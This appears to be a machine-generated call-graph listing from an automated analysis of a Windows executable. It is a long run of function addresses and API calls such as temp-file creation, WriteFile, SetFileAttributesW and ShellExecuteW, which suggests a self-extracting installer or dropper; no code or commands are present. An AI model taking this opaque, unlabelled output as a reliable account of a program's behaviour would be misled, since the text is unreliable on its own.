4015d8 179 API calls 11418->11421 11419->11415 11419->11424 11422 401ad3 11421->11422 12596 401880 11422->12596 11424->11054 11425->11407 11427 402721 11426->11427 11428 40271c 11426->11428 11429 402665 3 API calls 11427->11429 11428->11154 11430 402726 11429->11430 11431 402737 11430->11431 11432 402730 11430->11432 11431->11154 12626 4026df LoadLibraryA GetProcAddress 11432->12626 11436 404794 2 API calls 11435->11436 11437 404cbf 11436->11437 11438 4014bc 2 API calls 11437->11438 11439 404cca 11438->11439 11440 404ccf 11439->11440 11441 4013d1 2 API calls 11440->11441 11442 404cdd 11441->11442 11443 402ab8 2 API calls 11442->11443 11444 404ce8 11443->11444 11444->11172 11446 4014eb 2 API calls 11445->11446 11447 4053c3 11446->11447 11448 4014eb 2 API calls 11447->11448 11449 4053cb memset 11448->11449 11450 4053f9 11449->11450 11451 404e9f 2 API calls 11450->11451 11452 40541c 11451->11452 11453 401403 2 API calls 11452->11453 11454 405427 11453->11454 11455 405445 ShellExecuteExW 11454->11455 11456 40542c ??3@YAXPAX 11454->11456 11458 405485 11455->11458 11459 40545f 11455->11459 11457 405437 ??3@YAXPAX 11456->11457 11457->11178 11460 40547c ??3@YAXPAX 11458->11460 11461 405473 CloseHandle 11459->11461 11462 405468 WaitForSingleObject 11459->11462 11460->11457 11461->11460 11462->11461 11464 4083ea 4 API calls 11463->11464 11465 4052fa 11464->11465 11466 40247d 19 API calls 11465->11466 11467 405308 11466->11467 11468 402a67 2 API calls 11467->11468 11470 405312 11468->11470 11469 405348 wsprintfW 11471 402ab8 2 API calls 11469->11471 11470->11469 11473 402ab8 ??2@YAPAXI ??3@YAXPAX 11470->11473 11472 40537c 11471->11472 11474 402ab8 2 API calls 11472->11474 11473->11470 11475 405389 11474->11475 11476 40844b 22 API calls 11475->11476 11477 40539e ??3@YAXPAX 11476->11477 12628 4081be ??3@YAXPAX 11477->12628 11479 4053af 11479->11029 11481 4127e6 ctype 3 API calls 11480->11481 11482 4047ef 11481->11482 11483 412709 ctype 3 API calls 11482->11483 11484 41286e ??3@YAXPAX 11483->11484 11484->10831 11486 4056ff 11485->11486 11492 40571b 11485->11492 11489 405711 _wtol 11486->11489 11486->11492 11487 4053b2 9 API calls 11488 40573e 11487->11488 11490 405746 GetLastError 11488->11490 11491 40574c 11488->11491 11489->11492 11490->11491 11491->11029 11492->11487 11494 412468 2 API calls 11493->11494 11495 4059c8 11494->11495 11496 405a24 11495->11496 11498 402a67 2 API calls 11495->11498 11497 402b19 2 API calls 11496->11497 11499 405a2c 11497->11499 11501 4059d7 11498->11501 11500 402baf 2 API calls 11499->11500 11502 405a39 11500->11502 11503 405a95 ??3@YAXPAX 11501->11503 11505 4039e7 88 API calls 11501->11505 11504 402c49 2 API calls 11502->11504 11518 405a91 11503->11518 11506 405a46 11504->11506 11507 4059fb 11505->11507 11508 402c49 2 API calls 11506->11508 11507->11503 11511 412468 2 API calls 11507->11511 11509 405a53 11508->11509 11510 402c49 2 API calls 11509->11510 11512 405a60 11510->11512 11513 405a17 11511->11513 11514 412ace 2 API calls 11512->11514 11513->11503 11515 405a1b ??3@YAXPAX 11513->11515 11516 405a74 11514->11516 11515->11496 11516->11503 11517 405a7d ??3@YAXPAX 11516->11517 11517->11518 11518->10901 11519 4036f6 11520 402b19 2 API calls 11519->11520 11545 40370b 11520->11545 11521 4039aa ??3@YAXPAX 11522 4039e1 11521->11522 11522->10887 11522->10891 11523 4014eb ??2@YAPAXI ??3@YAXPAX 11523->11545 11524 402b19 2 API calls 11524->11545 11525 402dce ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 11525->11545 11526 40143c 2 API calls 11527 40377c ??3@YAXPAX ??3@YAXPAX 11526->11527 11528 4039b6 11527->11528 11527->11545 12634 403026 11528->12634 11532 4039d7 ??3@YAXPAX 11532->11522 11533 403889 strncmp 11535 403874 strncmp 11533->11535 11533->11545 11535->11533 11535->11545 11537 402c21 ??2@YAPAXI ??3@YAXPAX 11537->11545 11538 40143c 2 API calls 11540 4038f6 ??3@YAXPAX 11538->11540 11539 402c21 2 API calls 11539->11535 11541 4030cc 9 API calls 11540->11541 11542 403907 lstrcmpW 11541->11542 11542->11545 11543 40393e lstrlenW wcsncmp 11543->11545 11544 402910 lstrcmpW 11544->11545 11545->11521 11545->11523 11545->11524 11545->11525 11545->11526 11545->11528 11545->11533 11545->11537 11545->11538 11545->11539 11545->11543 11545->11544 11546 4035cf 7 API calls 11545->11546 11547 401403 2 API calls 11545->11547 12629 402958 11545->12629 12633 402990 ??3@YAXPAX ??3@YAXPAX 11545->12633 11546->11545 11547->11545 11549 402a67 2 API calls 11548->11549 11550 4051a7 11549->11550 11551 402ab8 2 API calls 11550->11551 11556 4051b4 11551->11556 11552 4051d0 11553 402ab8 2 API calls 11552->11553 11555 4051da 11553->11555 11554 401795 2 API calls 11554->11556 11557 4049a9 94 API calls 11555->11557 11556->11552 11556->11554 11558 4051e5 ??3@YAXPAX 11557->11558 11558->10955 11560 4049c0 lstrlenW 11559->11560 11561 4049ec 11559->11561 11562 401f6a CharUpperW 11560->11562 11561->10955 11563 4049d6 11562->11563 11563->11560 11563->11561 11564 4049f3 11563->11564 11565 402a67 2 API calls 11564->11565 11568 4049fc 11565->11568 12653 402e16 11568->12653 11569 4036f6 87 API calls 11570 404a6a 11569->11570 11571 404a74 ??3@YAXPAX ??3@YAXPAX 11570->11571 11572 404a8b ??3@YAXPAX ??3@YAXPAX 11570->11572 11571->11561 11572->11561 11574 401403 2 API calls 11573->11574 11575 401511 ??3@YAXPAX 11574->11575 11575->10955 11577 4027a1 11576->11577 11578 402787 CheckTokenMembership FreeSid 11576->11578 11577->10935 11577->10939 11578->11577 11580 4013d1 2 API calls 11579->11580 11581 404cfb 11580->11581 11582 401795 2 API calls 11581->11582 11583 404d06 11582->11583 11583->11001 11585 4035e9 11584->11585 11586 4035de 11584->11586 11588 416407 4 API calls 11585->11588 12663 402cad 11586->12663 11589 4035f5 11588->11589 11589->10985 11590->11002 11592 4083ea 4 API calls 11591->11592 11593 40449d 11592->11593 11593->10978 11594->10992 11598 409815 11595->11598 11603 409a82 11595->11603 11596 4029a6 lstrcmpW 11596->11598 11597 408c6a 25 API calls 11597->11598 11598->11596 11598->11597 11599 401556 6 API calls 11598->11599 11600 4083ea 4 API calls 11598->11600 11601 408bec 25 API calls 11598->11601 11602 408caa 25 API calls 11598->11602 11598->11603 11604 404495 4 API calls 11598->11604 11606 40247d 19 API calls 11598->11606 11607 409599 27 API calls 11598->11607 11608 409606 57 API calls 11598->11608 11610 404765 4 API calls 11598->11610 11611 40844b 22 API calls 11598->11611 12668 4084c5 11598->12668 12672 4081be ??3@YAXPAX 11598->12672 11599->11598 11600->11598 11601->11598 11602->11598 11603->11009 11604->11598 11606->11598 11607->11598 11608->11598 11610->11598 11611->11598 11613 4029a6 lstrcmpW 11612->11613 11614 40970f 11613->11614 11616 40971d 11614->11616 12673 401ed5 GetStdHandle WriteFile 11614->12673 11619 409730 11616->11619 12674 401ed5 GetStdHandle WriteFile 11616->12674 11618 409745 11620 409756 11618->11620 12676 401ed5 GetStdHandle WriteFile 11618->12676 11619->11618 12675 401ed5 GetStdHandle WriteFile 11619->12675 11623 4029a6 lstrcmpW 11620->11623 11624 409763 11623->11624 11625 409771 11624->11625 12677 401ed5 GetStdHandle WriteFile 11624->12677 11627 4029a6 lstrcmpW 11625->11627 11628 40977e 11627->11628 11629 40978c 11628->11629 12678 401ed5 GetStdHandle WriteFile 11628->12678 11630 4029a6 lstrcmpW 11629->11630 11632 409799 11630->11632 11633 4097a7 11632->11633 12679 401ed5 GetStdHandle WriteFile 11632->12679 11635 4029a6 lstrcmpW 11633->11635 11636 4097b4 11635->11636 11637 4097c2 11636->11637 12680 401ed5 GetStdHandle WriteFile 11636->12680 11639 4029a6 lstrcmpW 11637->11639 11640 4097cf 11639->11640 11641 4097e2 11640->11641 11643 4029a6 lstrcmpW 11640->11643 11644 4097f0 11641->11644 12681 401ed5 GetStdHandle WriteFile 11641->12681 11643->11641 11644->11003 11646 408c0f 11645->11646 11647 408c42 11646->11647 11648 408c24 11646->11648 12685 4085f7 11647->12685 12682 4085de 11648->12682 11653 40844b 22 API calls 11655 408c3d 11653->11655 11654 40844b 22 API calls 11654->11655 12688 4081be ??3@YAXPAX 11655->12688 11657 408c65 11657->11051 11659 408c7f 11658->11659 11660 4010bd 4 API calls 11659->11660 11661 408c8a 11660->11661 11662 40844b 22 API calls 11661->11662 11663 408c9b 11662->11663 12689 4081be ??3@YAXPAX 11663->12689 11665 408ca5 11665->11051 11667 4014eb 2 API calls 11666->11667 11668 4048b4 11667->11668 11669 402aa0 2 API calls 11668->11669 11670 4048bd GetTempPathW 11669->11670 11671 4048d6 11670->11671 11676 4048ed 11670->11676 11672 402aa0 2 API calls 11671->11672 11673 4048e1 GetTempPathW 11672->11673 11673->11676 11674 402aa0 2 API calls 11675 404910 wsprintfW 11674->11675 11675->11676 11676->11674 11677 404927 GetFileAttributesW 11676->11677 11678 40494b 11676->11678 11677->11676 11677->11678 11678->11036 11680 408cbd 11679->11680 12690 40862c 11680->12690 11683 40844b 22 API calls 11684 408cf2 11683->11684 12693 4081be ??3@YAXPAX 11684->12693 11686 408cfc 11686->11054 11688 404787 11687->11688 11690 404792 ??3@YAXPAX ??3@YAXPAX 11687->11690 11689 4032e9 16 API calls 11688->11689 11689->11690 11690->11029 11692 4029a6 lstrcmpW 11691->11692 11693 404e68 11692->11693 11694 404e9d 11693->11694 11695 401403 2 API calls 11693->11695 11694->11106 11696 404e77 11695->11696 11697 4044e2 20 API calls 11696->11697 11698 404e7d 11697->11698 11698->11694 11699 401795 2 API calls 11698->11699 11699->11694 11701 4014eb 2 API calls 11700->11701 11702 40549e 11701->11702 11703 4014eb 2 API calls 11702->11703 11704 4054a6 GetCommandLineW 11703->11704 11705 404e9f 2 API calls 11704->11705 11706 4054b6 11705->11706 11707 404cb1 2 API calls 11706->11707 11708 4054e9 11707->11708 11709 404ccf 2 API calls 11708->11709 11710 4054f6 11709->11710 11711 404ccf 2 API calls 11710->11711 11712 405503 11711->11712 11713 404ced 2 API calls 11712->11713 11714 405510 11713->11714 11715 404ced 2 API calls 11714->11715 11716 40551d 11715->11716 11717 404ced 2 API calls 11716->11717 11718 40552a 11717->11718 11719 404ced 2 API calls 11718->11719 11720 405537 11719->11720 11721 404ccf 2 API calls 11720->11721 11722 405544 11721->11722 11723 404ccf 2 API calls 11722->11723 11724 405551 11723->11724 11725 404ccf 2 API calls 11724->11725 11726 40555e 11725->11726 11727 40143c 2 API calls 11726->11727 11728 40556a 12 API calls 11727->11728 11729 405622 CreateJobObjectW 11728->11729 11730 4055ff GetLastError 11728->11730 11732 40563a AssignProcessToJobObject 11729->11732 11733 40569d ResumeThread WaitForSingleObject 11729->11733 11731 405607 ??3@YAXPAX ??3@YAXPAX 11730->11731 11731->11164 11732->11733 11734 405648 CreateIoCompletionPort 11732->11734 11735 4056ad CloseHandle GetExitCodeProcess 11733->11735 11734->11733 11736 40565a SetInformationJobObject ResumeThread 11734->11736 11737 4056d3 CloseHandle 11735->11737 11738 4056ca GetLastError 11735->11738 11741 405688 GetQueuedCompletionStatus 11736->11741 11739 4056dc CloseHandle 11737->11739 11740 4056df 11737->11740 11738->11737 11739->11740 11742 4056e5 CloseHandle 11740->11742 11743 4056ea 11740->11743 11741->11733 11744 405682 11741->11744 11742->11743 11743->11731 11744->11735 11744->11741 11746 4026b4 LoadLibraryA GetProcAddress 11745->11746 11747 4026cf 11745->11747 11746->11747 11747->11151 11749 4014eb 2 API calls 11748->11749 11757 405204 11749->11757 11750 401403 2 API calls 11750->11757 11751 405296 11752 4052d0 ??3@YAXPAX 11751->11752 11754 4051f3 3 API calls 11751->11754 11752->11107 11753 401795 2 API calls 11753->11757 11756 4052cd 11754->11756 11755 4029a6 lstrcmpW 11755->11757 11756->11752 11757->11750 11757->11751 11757->11753 11757->11755 11759 4083ea 4 API calls 11758->11759 11760 40476d 11759->11760 11760->11084 11761->11064 11763 405945 ??3@YAXPAX 11762->11763 11764 4057a9 11762->11764 11766 40594b 11763->11766 11764->11763 11765 4057bd GetDriveTypeW 11764->11765 11765->11763 11767 4057e9 11765->11767 11766->11065 11768 4048a3 6 API calls 11767->11768 11769 4057f7 CreateFileW 11768->11769 11770 40581d 11769->11770 11771 40590f ??3@YAXPAX ??3@YAXPAX 11769->11771 11772 4014eb 2 API calls 11770->11772 11771->11766 11773 405826 11772->11773 11774 401403 2 API calls 11773->11774 11775 405833 11774->11775 11776 402ab8 2 API calls 11775->11776 11777 405841 11776->11777 11778 4014bc 2 API calls 11777->11778 11779 40584d 11778->11779 11780 402ab8 2 API calls 11779->11780 11781 40585b 11780->11781 11782 402ab8 2 API calls 11781->11782 11783 405868 11782->11783 11784 4014bc 2 API calls 11783->11784 11785 405874 11784->11785 11786 402ab8 2 API calls 11785->11786 11787 405881 11786->11787 11788 402ab8 2 API calls 11787->11788 11789 40588a 11788->11789 11790 4014bc 2 API calls 11789->11790 11791 405896 11790->11791 11792 402ab8 2 API calls 11791->11792 11793 40589f 11792->11793 11794 402e16 3 API calls 11793->11794 11795 4058b1 WriteFile ??3@YAXPAX CloseHandle 11794->11795 11796 405920 11795->11796 11797 4058df 11795->11797 11798 4032e9 16 API calls 11796->11798 11797->11796 11799 4058e7 SetFileAttributesW ShellExecuteW ??3@YAXPAX 11797->11799 11800 405928 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11798->11800 11799->11771 11800->11766 11810 402805 11801->11810 11805 4014eb 2 API calls 11804->11805 11806 402dda 11805->11806 11807 402e12 11806->11807 11815 402aa0 11806->11815 11807->11204 11811 402813 ??2@YAPAXI 11810->11811 11812 40283f 11810->11812 11811->11812 11813 402824 ??3@YAXPAX 11811->11813 11812->11204 11813->11812 11816 402ab2 MultiByteToWideChar 11815->11816 11817 402aac 11815->11817 11816->11807 11818 4011b7 2 API calls 11817->11818 11818->11816 11819->11221 11821 402692 11820->11821 11822 402686 GetNativeSystemInfo 11820->11822 11821->11224 11822->11224 11823->11247 11825 401fb8 11824->11825 11827 401f78 11824->11827 11825->11253 11826 4126c0 CharUpperW 11826->11827 11827->11825 11827->11826 11828 401fc5 11827->11828 11832 4126c0 CharUpperW 11828->11832 11830 401fd5 11833 4126c0 CharUpperW 11830->11833 11832->11830 11833->11825 11837 4123a4 11834->11837 11838 41236b 2 API calls 11837->11838 11839 40614b 11838->11839 11839->10870 11839->10871 11890 402baf 11840->11890 11843 402baf 2 API calls 11844 403ebf 11843->11844 11894 402d03 11844->11894 11847 402be9 2 API calls 11848 403edc ??3@YAXPAX 11847->11848 11849 402d03 3 API calls 11848->11849 11850 403ef7 11849->11850 11851 402be9 2 API calls 11850->11851 11852 403f02 ??3@YAXPAX 11851->11852 11853 403f42 11852->11853 11854 403f18 11852->11854 11855 403f48 wsprintfA 11853->11855 11856 403f6f 11853->11856 11854->11853 11857 403f1d wsprintfA 11854->11857 11858 402c49 2 API calls 11855->11858 11859 402c49 2 API calls 11856->11859 11860 402c49 2 API calls 11857->11860 11861 403f64 11858->11861 11862 403f7c 11859->11862 11863 403f37 11860->11863 11865 402c49 2 API calls 11861->11865 11866 402c49 2 API calls 11862->11866 11864 402c49 2 API calls 11863->11864 11864->11853 11865->11856 11867 403f84 11866->11867 11868 402ee4 11867->11868 11869 402ef1 11868->11869 11909 412a6a 11869->11909 11871 402f30 11872 402fb8 memcmp 11871->11872 11873 402fdb memmove 11871->11873 11874 402f7b memcmp 11871->11874 11875 40300e 11871->11875 11915 412a36 11871->11915 11919 402c21 11871->11919 11872->11871 11873->11871 11873->11875 11874->11871 11874->11875 11879 402be9 11875->11879 11880 402bf5 11879->11880 11882 402c06 11879->11882 11881 402805 2 API calls 11880->11881 11881->11882 11882->11283 11884 402851 2 API calls 11883->11884 11885 402c8f 11884->11885 11885->11290 11887 402c58 11886->11887 11887->11887 11888 402851 2 API calls 11887->11888 11889 402c65 11888->11889 11889->11283 11891 402bc5 11890->11891 11891->11891 11892 402805 2 API calls 11891->11892 11893 402bd2 11892->11893 11893->11843 11895 402d1e 11894->11895 11896 402d35 11895->11896 11897 402d2a 11895->11897 11898 402b19 2 API calls 11896->11898 11906 402b61 11897->11906 11900 402d3e 11898->11900 11902 402805 2 API calls 11900->11902 11901 402d33 11901->11847 11903 402d47 11902->11903 11904 402b61 2 API calls 11903->11904 11905 402d75 ??3@YAXPAX 11904->11905 11905->11901 11907 402805 2 API calls 11906->11907 11908 402b7c 11907->11908 11908->11901 11910 412a7a 11909->11910 11911 402f03 lstrlenA lstrlenA 11909->11911 11922 412305 SetFilePointer 11910->11922 11911->11871 11914 4129fa GetLastError 11914->11911 11916 412a4e 11915->11916 11917 4129fa GetLastError 11916->11917 11918 412a65 11917->11918 11918->11871 11925 402851 11919->11925 11923 412338 11922->11923 11924 41232e GetLastError 11922->11924 11923->11914 11924->11923 11926 402895 11925->11926 11927 402865 11925->11927 11926->11871 11928 402805 2 API calls 11927->11928 11928->11926 11934 401ff0 11929->11934 11937 412260 11929->11937 11942 4132c1 11929->11942 11930 40624e 11930->10887 11930->11519 11935 401ff7 VirtualFree 11934->11935 11936 402008 11934->11936 11935->11936 11936->11930 11938 412280 11937->11938 11939 41226e 11937->11939 11938->11930 11947 411e20 11939->11947 11943 4132de 11942->11943 11944 4132ce 11942->11944 11943->11930 11952 412bb5 11944->11952 11948 401ff0 VirtualFree 11947->11948 11949 411e39 11948->11949 11950 401ff0 VirtualFree 11949->11950 11951 411e65 ??3@YAXPAX 11950->11951 11951->11938 11953 401ff0 VirtualFree 11952->11953 11954 412bf7 ??3@YAXPAX 11953->11954 11954->11943 11956 4046ae 11955->11956 11967 4045d4 11956->11967 11960 404644 11959->11960 11961 4045d4 _wtol 11960->11961 11962 404665 11961->11962 11962->11331 11964 404675 11963->11964 11965 4045d4 _wtol 11964->11965 11966 40468d 11965->11966 11966->11337 11970 4045de 11967->11970 11968 4045f9 _wtol 11968->11970 11969 404632 11969->11327 11970->11968 11970->11969 11972 4014eb 2 API calls 11971->11972 11973 404c90 11972->11973 11974 401795 2 API calls 11973->11974 11975 404c99 11974->11975 11976 401795 2 API calls 11975->11976 11977 404ca2 11976->11977 11978 401795 2 API calls 11977->11978 11979 404cab 11978->11979 11980 40484d 11979->11980 11981 40489d ??3@YAXPAX 11980->11981 11982 40485e 11980->11982 11981->10928 11982->11981 11984 402cce 11982->11984 11985 402ce4 11984->11985 11986 402cf8 11985->11986 11988 40289b memmove 11985->11988 11986->11981 11988->11986 11990 404820 11989->11990 11991 402cce memmove 11990->11991 11992 404847 ??3@YAXPAX 11991->11992 11992->10930 11995 40291b 11993->11995 11994 402927 lstrcmpW 11994->11995 11996 402944 11994->11996 11995->11994 11995->11996 11996->10985 12010 415eea _EH_prolog 11997->12010 12029 401397 11997->12029 12032 4169ec 11997->12032 11998 40115f 11998->11397 12587 401519 12002->12587 12005 401503 2 API calls 12006 40158d ??3@YAXPAX 12005->12006 12592 4081be ??3@YAXPAX 12006->12592 12009 4015a2 12009->11403 12011 415f0b 12010->12011 12012 4169ec 13 API calls 12011->12012 12013 415f49 12012->12013 12014 415f75 12013->12014 12015 415f4f 12013->12015 12016 4014eb 2 API calls 12014->12016 12043 415b0a 12015->12043 12018 415f86 12016->12018 12040 418390 _EH_prolog 12018->12040 12030 4013a3 ??3@YAXPAX 12029->12030 12031 4013ac 12029->12031 12030->12031 12031->11998 12033 4169fe 12032->12033 12038 412a6a 3 API calls 12033->12038 12034 416a12 12035 416a49 12034->12035 12039 412a6a 3 API calls 12034->12039 12035->11998 12036 416a26 12036->12035 12574 416891 12036->12574 12038->12034 12039->12036 12051 4180ff 12040->12051 12557 41599a 12043->12557 12073 4157f1 12051->12073 12207 415762 12073->12207 12208 4127e6 ctype 3 API calls 12207->12208 12209 41576b 12208->12209 12210 4127e6 ctype 3 API calls 12209->12210 12211 415773 12210->12211 12212 4127e6 ctype 3 API calls 12211->12212 12213 41577b 12212->12213 12214 4127e6 ctype 3 API calls 12213->12214 12215 415783 12214->12215 12216 4127e6 ctype 3 API calls 12215->12216 12217 41578b 12216->12217 12218 4127e6 ctype 3 API calls 12217->12218 12219 415793 12218->12219 12220 4127e6 ctype 3 API calls 12219->12220 12221 41579d 12220->12221 12222 4127e6 ctype 3 API calls 12221->12222 12223 4157a5 12222->12223 12224 4127e6 ctype 3 API calls 12223->12224 12225 4157b2 12224->12225 12226 4127e6 ctype 3 API calls 12225->12226 12227 4157ba 12226->12227 12228 4127e6 ctype 3 API calls 12227->12228 12229 4157c7 12228->12229 12230 4127e6 ctype 3 API calls 12229->12230 12231 4157cf 12230->12231 12232 4127e6 ctype 3 API calls 12231->12232 12233 4157dc 12232->12233 12234 4127e6 ctype 3 API calls 12233->12234 12235 4157e4 12234->12235 12558 4127e6 ctype 3 API calls 12557->12558 12559 4159a8 12558->12559 12575 413b40 5 API calls 12574->12575 12577 4168a9 12575->12577 12576 4168bd 12576->12035 12577->12576 12578 40b2b0 3 API calls 12577->12578 12579 4168e1 memcpy 12578->12579 12583 4168f6 12579->12583 12580 41698a ??3@YAXPAX 12580->12576 12582 416973 memmove 12582->12583 12583->12580 12583->12582 12584 41699f memcpy 12583->12584 12585 416995 ??3@YAXPAX 12583->12585 12586 412a6a 3 API calls 12584->12586 12585->12576 12586->12585 12593 4010bd 12587->12593 12590 4014eb 2 API calls 12591 40152f 12590->12591 12591->12005 12592->12009 12594 4083ea 4 API calls 12593->12594 12595 4010c5 12594->12595 12595->12590 12597 401893 12596->12597 12598 401403 2 API calls 12597->12598 12599 4018a0 12598->12599 12600 401795 2 API calls 12599->12600 12601 4018a9 CreateThread 12600->12601 12602 4018d8 12601->12602 12603 4018dd WaitForSingleObject 12601->12603 12620 40133c 12601->12620 12606 408caa 25 API calls 12602->12606 12604 4018fa 12603->12604 12605 40192c 12603->12605 12607 401918 12604->12607 12611 401909 12604->12611 12608 401928 12605->12608 12609 401934 GetExitCodeThread 12605->12609 12606->12603 12612 409606 57 API calls 12607->12612 12608->11424 12610 40194b 12609->12610 12610->12608 12610->12611 12613 40197a SetLastError 12610->12613 12611->12608 12614 409606 57 API calls 12611->12614 12612->12608 12613->12611 12614->12608 12616 4014eb 2 API calls 12615->12616 12617 4016fb 12616->12617 12618 4014eb 2 API calls 12617->12618 12619 401707 12618->12619 12619->11418 12621 401345 12620->12621 12622 401358 12620->12622 12621->12622 12623 401347 Sleep 12621->12623 12624 401391 12622->12624 12625 401383 EndDialog 12622->12625 12623->12621 12625->12624 12627 402701 12626->12627 12627->11428 12628->11479 12630 402965 lstrcmpW 12629->12630 12631 40298d 12629->12631 12632 40297c 12630->12632 12631->11545 12632->12630 12632->12631 12633->11545 12635 403041 12634->12635 12636 403035 12634->12636 12638 402b19 2 API calls 12635->12638 12652 401ed5 GetStdHandle WriteFile 12636->12652 12641 40304b 12638->12641 12639 40303c 12651 402990 ??3@YAXPAX ??3@YAXPAX 12639->12651 12640 403076 12642 402dce 3 API calls 12640->12642 12641->12640 12644 402c21 2 API calls 12641->12644 12643 403088 12642->12643 12645 403096 12643->12645 12646 4030aa 12643->12646 12644->12641 12647 409606 57 API calls 12645->12647 12648 409606 57 API calls 12646->12648 12649 4030a5 ??3@YAXPAX ??3@YAXPAX 12647->12649 12648->12649 12649->12639 12651->11532 12652->12639 12654 402b19 2 API calls 12653->12654 12656 402e25 12654->12656 12655 402e61 12655->11569 12656->12655 12659 402b97 12656->12659 12660 402ba3 12659->12660 12661 402ba9 WideCharToMultiByte 12659->12661 12662 402805 2 API calls 12660->12662 12661->12655 12662->12661 12664 4013d1 2 API calls 12663->12664 12665 402cbb 12664->12665 12666 4013d1 2 API calls 12665->12666 12667 402cc7 12666->12667 12667->11585 12669 4084d0 12668->12669 12670 4084d5 12668->12670 12669->11598 12670->12669 12671 40844b 22 API calls 12670->12671 12671->12669 12672->11598 12673->11616 12674->11619 12675->11618 12676->11620 12677->11625 12678->11629 12679->11633 12680->11637 12681->11644 12683 4083ea 4 API calls 12682->12683 12684 4085e6 12683->12684 12684->11653 12686 4010bd 4 API calls 12685->12686 12687 4085ff 12686->12687 12687->11654 12688->11657 12689->11665 12691 4083ea 4 API calls 12690->12691 12692 408634 12691->12692 12692->11683 12693->11686 13187 418c06 13196 414368 13187->13196 13190 4127e6 ctype 3 API calls 13195 418c26 13190->13195 13191 418c6a 13195->13191 13205 4184f5 ??2@YAPAXI 13195->13205 13209 4142fb 13195->13209 13216 413851 13195->13216 13223 413ef7 13196->13223 13199 413ef7 7 API calls 13200 414382 13199->13200 13228 418adb 13200->13228 13203 418adb 7 API calls 13204 41439a 13203->13204 13204->13190 13206 418504 13205->13206 13207 416407 4 API calls 13206->13207 13208 41851f 13207->13208 13208->13195 13243 407531 13209->13243 13212 407531 2 API calls 13213 414310 13212->13213 13214 407531 2 API calls 13213->13214 13215 414316 13214->13215 13215->13195 13247 4075df 13216->13247 13219 41387c 13219->13195 13220 4075df 2 API calls 13221 41386c 13220->13221 13221->13219 13222 4075df 2 API calls 13221->13222 13222->13219 13224 4127e6 ctype 3 API calls 13223->13224 13225 413eff 13224->13225 13233 413cd1 13225->13233 13229 4127e6 ctype 3 API calls 13228->13229 13230 418ae3 13229->13230 13238 41854a 13230->13238 13234 41271d 4 API calls 13233->13234 13235 413ce9 13234->13235 13236 413d05 13235->13236 13237 4163dd 4 API calls 13235->13237 13236->13199 13237->13235 13239 41271d 4 API calls 13238->13239 13240 418562 13239->13240 13241 41438e 13240->13241 13242 416407 4 API calls 13240->13242 13241->13203 13242->13240 13244 40753c CloseHandle 13243->13244 13246 407551 13243->13246 13245 407547 GetLastError 13244->13245 13244->13246 13245->13246 13246->13212 13250 407591 CreateEventW 13247->13250 13253 40751b 13250->13253 13252 4075b5 13252->13219 13252->13220 13254 407522 13253->13254 13255 407525 GetLastError 13253->13255 13254->13252 13256 40752f 13255->13256 13256->13252 14044 412f0c 14048 412f19 14044->14048 14045 412fb2 14046 412f40 memcpy 14046->14048 14048->14045 14048->14046 14049 412b55 14048->14049 14051 412b5f 14049->14051 14050 413b69 110 API calls 14052 412b8e 14050->14052 14051->14050 14052->14048 14074 405b1f 14075 402a67 2 API calls 14074->14075 14076 405b33 14075->14076 14077 4041b2 7 API calls 14076->14077 14078 405b41 14077->14078 14096 40426d 14078->14096 14080 405b50 14119 404328 14080->14119 14082 405b5f 14142 4043e3 14082->14142 14084 405be5 14161 403b54 14084->14161 14088 402e67 6 API calls 14090 405b68 14088->14090 14089 4041b2 7 API calls 14089->14090 14090->14084 14090->14088 14090->14089 14091 40426d 7 API calls 14090->14091 14092 404328 7 API calls 14090->14092 14093 4043e3 4 API calls 14090->14093 14147 403573 GetEnvironmentVariableW 14090->14147 14155 405aaf 14090->14155 14091->14090 14092->14090 14093->14090 14097 4014eb 2 API calls 14096->14097 14098 40427b 14097->14098 14099 40143c 2 API calls 14098->14099 14100 404286 14099->14100 14101 402ab8 2 API calls 14100->14101 14102 404293 14101->14102 14103 402a67 2 API calls 14102->14103 14104 4042a0 14103->14104 14105 404137 3 API calls 14104->14105 14106 4042b0 ??3@YAXPAX 14105->14106 14107 40143c 2 API calls 14106->14107 14108 4042c4 14107->14108 14109 402ab8 2 API calls 14108->14109 14110 4042d1 14109->14110 14111 402a67 2 API calls 14110->14111 14112 4042de 14111->14112 14113 404137 3 API calls 14112->14113 14114 4042ee ??3@YAXPAX 14113->14114 14115 402a67 2 API calls 14114->14115 14116 404305 14115->14116 14117 404137 3 API calls 14116->14117 14118 404314 ??3@YAXPAX ??3@YAXPAX 14117->14118 14118->14080 14120 4014eb 2 API calls 14119->14120 14121 404336 14120->14121 14122 40143c 2 API calls 14121->14122 14123 404341 14122->14123 14124 402ab8 2 API calls 14123->14124 14125 40434e 14124->14125 14126 402a67 2 API calls 14125->14126 14127 40435b 14126->14127 14128 404137 3 API calls 14127->14128 14129 40436b ??3@YAXPAX 14128->14129 14130 40143c 2 API calls 14129->14130 14131 40437f 14130->14131 14132 402ab8 2 API calls 14131->14132 14133 40438c 14132->14133 14134 402a67 2 API calls 14133->14134 14135 404399 14134->14135 14136 404137 3 API calls 14135->14136 14137 4043a9 ??3@YAXPAX 14136->14137 14138 402a67 2 API calls 14137->14138 14139 4043c0 14138->14139 14140 404137 3 API calls 14139->14140 14141 4043cf ??3@YAXPAX ??3@YAXPAX 14140->14141 14141->14082 14143 402a67 2 API calls 14142->14143 14144 4043f6 14143->14144 14145 404137 3 API calls 14144->14145 14146 404407 ??3@YAXPAX 14145->14146 14146->14090 14148 4014eb 2 API calls 14147->14148 14149 403597 14148->14149 14150 402aa0 2 API calls 14149->14150 14151 4035a5 14150->14151 14152 402aa0 2 API calls 14151->14152 14153 4035b1 GetEnvironmentVariableW 14152->14153 14154 4035bf 14153->14154 14154->14090 14156 405b1a ??3@YAXPAX 14155->14156 14159 405ac5 14155->14159 14156->14084 14156->14090 14157 401f6a CharUpperW 14157->14159 14158 402cce memmove 14158->14159 14159->14156 14159->14157 14159->14158 14160 4035f9 3 API calls 14159->14160 14160->14159 14162 403b71 14161->14162 14164 403b7d 14161->14164 14163 403b77 _wtol 14162->14163 14162->14164 14163->14164 14165 403c11 SHGetSpecialFolderPathW 14164->14165 14166 403e91 ??3@YAXPAX 14164->14166 14165->14166 14167 403c29 14165->14167 14168 402a67 2 API calls 14167->14168 14169 403c38 14168->14169 14170 4014eb 2 API calls 14169->14170 14171 403c40 14170->14171 14172 4014eb 2 API calls 14171->14172 14173 403c48 14172->14173 14174 4014eb 2 API calls 14173->14174 14175 403c50 14174->14175 14176 4014eb 2 API calls 14175->14176 14177 403c58 14176->14177 14178 4014eb 2 API calls 